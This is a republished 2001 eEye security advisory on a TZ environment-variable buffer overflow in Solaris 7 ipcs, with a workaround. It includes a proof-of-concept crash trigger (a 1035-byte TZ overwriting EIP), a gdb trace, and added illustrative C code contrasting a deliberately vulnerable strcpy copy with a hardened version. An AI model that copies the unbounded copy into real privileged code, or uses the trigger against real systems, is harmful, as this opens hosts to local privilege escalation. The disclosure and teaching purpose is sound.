Solaris ipcs vulnerability

By ServerWatch Staff
Posted Apr 13, 2001


Date:         Thu, 12 Apr 2001 18:07:08 -0700
From: Marc Maiffret <marc@EEYE.COM>
Subject:      Solaris ipcs vulnerability
Solaris ipcs vulnerability

Release Date:
April 11, 2001

Systems Affected:
Solaris 7 (x86)
Other versions of Solaris are most likely affected also.

Discovered by:
Riley Hassell riley@eeye.com

Description:
We have discovered a buffer overflow in the /usr/bin/i86/ipcs utility provided with Solaris 7. The problem exists in the parsing of the TZ (TIMEZONE) environment variable. By exploiting this vulnerability an attacker can achieve local sys group privileges. IPCS is used for gathering information on active inter-process communication facilities. Exploitation of this vulnerability would be very difficult, but not impossible.

bash-2.03$ TZ=`perl -e 'print "A"x1035'`
bash-2.03$ /usr/bin/i86/ipcs
IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
Message Queue facility inactive.
T ID KEY MODE OWNER GROUP
Shared Memory:
m 0 0x500004d3 --rw-r--r-- root root
Semaphore facility inactive.
Segmentation Fault (core dumped)

Note: [buffer] stands for the TZ value, a string of roughly 1036 characters (here all A's), echoed back in the timezone position of the header line.

bash-2.03$ su root
Password:
# gdb /usr/bin/i86/ipcs core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
<snip>
#0 0x41414141 in ?? ()
(gdb) info reg eip
eip 0x41414141 0x41414141
(gdb)
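The advisory only shows the symptom (EIP overwritten with 0x41414141 when TZ is about 1K of A's), not the code in ipcs that copies TZ. The following is an added illustrative example, not eEye's or Sun's code and not the real ipcs source: it models the bug class, a setgid program copying an attacker-controlled environment variable into a fixed stack buffer with no bound, next to a hardened version that checks the length and falls back to a safe default. The buffer size (64 bytes instead of ipcs' roughly 1K), the function names, and the "UTC" fallback are all assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative buffer size only; the page does not show ipcs' real buffer,
 * it only tells us that ~1035 bytes reach the saved return address. */
#define TZ_BUF 64

/* Vulnerable pattern: copies whatever TZ holds into a stack buffer.
 * A setgid binary inherits its environment from the unprivileged caller,
 * so a TZ longer than TZ_BUF walks over the saved EIP (0x41414141). */
void tz_copy_unbounded(const char *tz)
{
    char buf[TZ_BUF];
    strcpy(buf, tz);              /* no length check: overflow if strlen(tz) >= TZ_BUF */
    printf("timezone: %s\n", buf);
}

/* Bounded length scan so we never read past 'limit' bytes of untrusted input. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Hardened pattern: validate before copying and refuse oversized values
 * outright rather than truncating silently. Returns 0 on success, -1 on reject. */
int tz_copy_bounded(const char *tz, char *out, size_t outlen)
{
    if (tz == NULL || out == NULL || outlen == 0)
        return -1;
    size_t n = bounded_len(tz, outlen);
    if (n >= outlen)              /* no room for the terminating NUL: reject */
        return -1;
    memcpy(out, tz, n + 1);
    return 0;
}

/* Builds the same payload as the advisory's perl one-liner: n bytes of 'A'.
 * Caller frees the result. */
char *make_tz_payload(size_t n)
{
    char *p = malloc(n + 1);
    if (p == NULL)
        return NULL;
    memset(p, 'A', n);
    p[n] = '\0';
    return p;
}

/* What a privileged parser should do with TZ: validate, and on rejection
 * fall back to a fixed default ("UTC" is an assumption for this example).
 * Returns 1 if the fallback was used, 0 if the caller's value was accepted. */
int load_tz(const char *env_tz, char *out, size_t outlen)
{
    if (tz_copy_bounded(env_tz, out, outlen) != 0) {
        strncpy(out, "UTC", outlen);
        out[outlen - 1] = '\0';
        return 1;
    }
    return 0;
}

int main(void)
{
    char tz[TZ_BUF];
    char *payload = make_tz_payload(1035);   /* constructed input, as in the advisory */
    if (payload == NULL)
        return 1;

    /* The unbounded copy is only exercised with a short, safe value here;
     * feeding it 'payload' would reproduce the crash from the advisory. */
    tz_copy_unbounded("US/Pacific");

    int fell_back = load_tz(payload, tz, sizeof tz);
    printf("1035-byte TZ: %s, using \"%s\"\n", fell_back ? "rejected" : "accepted", tz);
    fell_back = load_tz("US/Pacific", tz, sizeof tz);
    printf("normal TZ: %s, using \"%s\"\n", fell_back ? "rejected" : "accepted", tz);

    free(payload);
    return 0;
}
```

The check that matters is the one on the length before the copy: a setgid program has to treat every environment variable, TZ included, as input chosen by the caller, and the same reasoning applies to the rest of the environment and to argv.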

Vendor Status:
Sun Microsystems has been contacted. They are currently working on patches for this and other related vulnerabilities eEye has discovered.

Workaround:
chmod -s /usr/bin/i86/ipcs
This removes the setgid bit from /usr/bin/i86/ipcs, so anyone who does exploit the overflow gains only their own privileges, not those of the sys group. Note that chmod -s clears both the setuid and setgid bits, and that unprivileged users may lose whatever access to the kernel's IPC tables the sys group granted ipcs; root is unaffected.

Greetings:
ADM, Ryan "shellcode ninja" Permeh, KAM, Lamagra, Zen-Parse, Loki, and last but not least- Speakeasy.net

Copyright (c) 1998-2001 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
info@eEye.com
